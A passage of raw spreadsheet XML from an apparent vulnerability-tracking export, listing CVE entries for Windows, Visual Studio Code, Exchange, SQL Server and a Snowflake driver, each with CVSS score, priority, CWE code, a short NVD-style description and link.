      </c>
      <c r="D320" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F320" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G320" s="5" t="inlineStr"/>
      <c r="H320" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I320" s="5" t="inlineStr"/>
      <c r="J320" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K320" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019</t>
        </is>
      </c>
      <c r="L320" s="5" t="inlineStr"/>
      <c r="M320" s="5" t="inlineStr"/>
      <c r="N320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O320" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P320" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q320" s="5" t="inlineStr"/>
      <c r="R320" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S320" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81354</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81356</t>
        </is>
      </c>
      <c r="D321" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F321" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I321" s="5" t="inlineStr"/>
      <c r="J321" s="5" t="inlineStr"/>
      <c r="K321" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L321" s="5" t="inlineStr"/>
      <c r="M321" s="5" t="inlineStr"/>
      <c r="N321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O321" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P321" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q321" s="5" t="inlineStr"/>
      <c r="R321" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="S321" s="5" t="inlineStr">
        <is>
          <t>Inconsistent interpretation of http requests ('http request/response smuggling') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81356</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81357</t>
        </is>
      </c>
      <c r="D322" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F322" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I322" s="5" t="inlineStr"/>
      <c r="J322" s="5" t="inlineStr"/>
      <c r="K322" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L322" s="5" t="inlineStr"/>
      <c r="M322" s="5" t="inlineStr"/>
      <c r="N322" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O322" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P322" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q322" s="5" t="inlineStr"/>
      <c r="R322" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S322" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81357</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81378</t>
        </is>
      </c>
      <c r="D323" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F323" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I323" s="5" t="inlineStr"/>
      <c r="J323" s="5" t="inlineStr"/>
      <c r="K323" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L323" s="5" t="inlineStr"/>
      <c r="M323" s="5" t="inlineStr"/>
      <c r="N323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O323" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P323" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q323" s="5" t="inlineStr"/>
      <c r="R323" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="S323" s="5" t="inlineStr">
        <is>
          <t>Interpretation conflict in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81378</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81379</t>
        </is>
      </c>
      <c r="D324" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F324" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I324" s="5" t="inlineStr"/>
      <c r="J324" s="5" t="inlineStr"/>
      <c r="K324" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L324" s="5" t="inlineStr"/>
      <c r="M324" s="5" t="inlineStr"/>
      <c r="N324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O324" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P324" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q324" s="5" t="inlineStr"/>
      <c r="R324" s="5" t="inlineStr">
        <is>
          <t>CWE-636</t>
        </is>
      </c>
      <c r="S324" s="5" t="inlineStr">
        <is>
          <t>Not failing securely ('failing open') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81379</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83939</t>
        </is>
      </c>
      <c r="D325" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F325" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I325" s="5" t="inlineStr"/>
      <c r="J325" s="5" t="inlineStr"/>
      <c r="K325" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L325" s="5" t="inlineStr"/>
      <c r="M325" s="5" t="inlineStr"/>
      <c r="N325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O325" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P325" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q325" s="5" t="inlineStr"/>
      <c r="R325" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S325" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83939</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86600</t>
        </is>
      </c>
      <c r="D326" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F326" s="5" t="inlineStr">
        <is>
          <t>412d305a-227d-44f9-a262-a31ba44f2aea</t>
        </is>
      </c>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I326" s="5" t="inlineStr"/>
      <c r="J326" s="5" t="inlineStr"/>
      <c r="K326" s="5" t="inlineStr"/>
      <c r="L326" s="5" t="inlineStr"/>
      <c r="M326" s="5" t="inlineStr"/>
      <c r="N326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O326" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P326" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q326" s="5" t="inlineStr"/>
      <c r="R326" s="5" t="inlineStr">
        <is>
          <t>CWE-441, CWE-522</t>
        </is>
      </c>
      <c r="S326" s="5" t="inlineStr">
        <is>
          <t>In affected Snowflake drivers, WORKLOAD_IDENTITY authentication requests a cloud workload-identity token and attaches it to the login request without verifying that the configured host is a Snowflake endpoint. An attacker who can modify the connection configuration can cause the driver to mint a fresh attestation and send it to a host they control. The captured token can be replayed to Snowflake for its remaining lifetime in accounts where that workload identity is already registered. On Azure, the token audience is also taken from connection configuration. Combined with an attacker-controlled host, the driver can request a Managed Identity access token scoped to a non-Snowflake Azure resource and deliver it to the attacker. That path is the only case in which impact extends beyond Snowflake; it is bounded by the token lifetime and the managed identity’s permissions. Successful exploitation requires WORKLOAD_IDENTITY authentication on a workload that already has an ambient cloud identity. Patched driver versions restrict this authenticator to recognized Snowflake hosts. Users must manually upgrade.</t>
        </is>
      </c>
      <c r="T326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86600</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47297</t>
        </is>
      </c>
      <c r="D327" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F327" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I327" s="5" t="inlineStr"/>
      <c r="J327" s="5" t="inlineStr"/>
      <c r="K327" s="5" t="inlineStr"/>
      <c r="L327" s="5" t="inlineStr"/>
      <c r="M327" s="5" t="inlineStr"/>
      <c r="N327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O327" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P327" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q327" s="5" t="inlineStr"/>
      <c r="R327" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S327" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47297</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55007</t>
        </is>
      </c>
      <c r="D328" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F328" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I328" s="5" t="inlineStr"/>
      <c r="J328" s="5" t="inlineStr"/>
      <c r="K328" s="5" t="inlineStr"/>
      <c r="L328" s="5" t="inlineStr"/>
      <c r="M328" s="5" t="inlineStr"/>
      <c r="N328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O328" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P328" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q328" s="5" t="inlineStr"/>
      <c r="R328" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S328" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Exchange Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55007</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69325</t>
        </is>
      </c>
      <c r="D329" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F329" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I329" s="5" t="inlineStr"/>
      <c r="J329" s="5" t="inlineStr"/>
      <c r="K329" s="5" t="inlineStr"/>
      <c r="L329" s="5" t="inlineStr"/>
      <c r="M329" s="5" t="inlineStr"/>
      <c r="N329" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O329" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P329" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q329" s="5" t="inlineStr"/>
      <c r="R329" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S329" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69325</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69380</t>
        </is>
      </c>
      <c r="D330" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F330" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I330" s="5" t="inlineStr"/>
      <c r="J330" s="5" t="inlineStr"/>
      <c r="K330" s="5" t="inlineStr"/>
      <c r="L330" s="5" t="inlineStr"/>
      <c r="M330" s="5" t="inlineStr"/>
      <c r="N330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O330" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P330" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q330" s="5" t="inlineStr"/>
      <c r="R330" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S330" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69380</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69438</t>
        </is>
      </c>
      <c r="D331" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F331" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I331" s="5" t="inlineStr"/>
      <c r="J331" s="5" t="inlineStr"/>
      <c r="K331" s="5" t="inlineStr"/>
      <c r="L331" s="5" t="inlineStr"/>
      <c r="M331" s="5" t="inlineStr"/>
      <c r="N331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O331" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P331" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q331" s="5" t="inlineStr"/>
      <c r="R331" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="S331" s="5" t="inlineStr">
        <is>
          <t>Incorrect conversion between numeric types in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69438</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69510</t>
        </is>
      </c>
      <c r="D332" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F332" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I332" s="5" t="inlineStr"/>
      <c r="J332" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K332" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L332" s="5" t="inlineStr"/>
      <c r="M332" s="5" t="inlineStr"/>
      <c r="N332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O332" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P332" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q332" s="5" t="inlineStr"/>
      <c r="R332" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S332" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69510</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69524</t>
        </is>
      </c>
      <c r="D333" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F333" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I333" s="5" t="inlineStr"/>
      <c r="J333" s="5" t="inlineStr"/>
      <c r="K333" s="5" t="inlineStr"/>
      <c r="L333" s="5" t="inlineStr"/>
      <c r="M333" s="5" t="inlineStr"/>
      <c r="N333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O333" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P333" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q333" s="5" t="inlineStr"/>
      <c r="R333" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S333" s="5" t="inlineStr">
        <is>
          <t>Use after free in Active Directory Domain Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69524</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69530</t>
        </is>
      </c>
      <c r="D334" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E334" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F334" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I334" s="5" t="inlineStr"/>
      <c r="J334" s="5" t="inlineStr"/>
      <c r="K334" s="5" t="inlineStr"/>
      <c r="L334" s="5" t="inlineStr"/>
      <c r="M334" s="5" t="inlineStr"/>
      <c r="N334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O334" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P334" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q334" s="5" t="inlineStr"/>
      <c r="R334" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S334" s="5" t="inlineStr">
        <is>
          <t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69530</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69546</t>
        </is>
      </c>
      <c r="D335" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E335" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F335" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I335" s="5" t="inlineStr"/>
      <c r="J335" s="5" t="inlineStr"/>
      <c r="K335" s="5" t="inlineStr"/>
      <c r="L335" s="5" t="inlineStr"/>
      <c r="M335" s="5" t="inlineStr"/>
      <c r="N335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O335" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P335" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q335" s="5" t="inlineStr"/>
      <c r="R335" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S335" s="5" t="inlineStr">
        <is>
          <t>Use after free in Active Directory Domain Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69546</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69620</t>
        </is>
      </c>
      <c r="D336" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E336" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F336" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G336" s="5" t="inlineStr"/>
      <c r="H336" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I336" s="5" t="inlineStr"/>
      <c r="J336" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K336" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L336" s="5" t="inlineStr"/>
      <c r="M336" s="5" t="inlineStr"/>
      <c r="N336" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O336" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P336" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q336" s="5" t="inlineStr"/>
      <c r="R336" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
